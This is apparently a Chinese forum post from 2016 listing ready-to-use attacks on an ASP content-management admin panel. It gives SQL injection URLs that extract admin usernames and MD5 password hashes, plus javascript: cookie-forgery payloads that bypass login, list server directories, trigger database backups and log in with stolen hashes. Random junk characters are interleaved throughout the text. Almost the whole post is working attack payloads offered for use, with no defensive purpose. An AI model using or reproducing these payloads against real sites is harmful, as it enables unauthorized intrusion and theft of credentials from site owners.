一、注入
" I( O& f) H. |; x1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2. ]0 b. n6 w9 Y& b5 }1 c3 C% h
( d1 o2 _% c2 z2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
( `( H$ v0 R' C3 l0 I4 x第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
; N( |. L: q, _: b5 E5 \$ M可得到用户名和MD5加密码的密码。$ ]+ t& ?0 }3 F+ i
0 l/ x" q7 O1 S6 y: j! W; f
二、cookies欺骗
! F4 f* [ @. C. ~
v5 m D j* y* P2 R5 E! K1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. 7 k- k# A. L7 A( U9 ]5 {
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"0 [- r# s2 G/ \5 F; J; {6 c
: R' S# q* w& ~7 i/ \2 j+ Z2 C2、列目录.
0 ~( c7 K& l, U& K# K7 jjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."# S: Y6 Z/ W9 t
" ~0 W0 G) K6 w
3、数据库备份(适用性好像比较低.)
6 `/ ]. g2 G0 n- M( bjavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"" ?1 C9 w# e% }4 b6 C/ p# Z
7 @% Y2 T; g0 u) e
4、得到MD5密码解不了密进后台方法
0 h+ C4 y! H4 E8 Ljavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
8 y" A/ k* v6 d- Q2 _! E5 Y+ B |
发表于 2016-5-11 14:55:08
收藏
支持
反对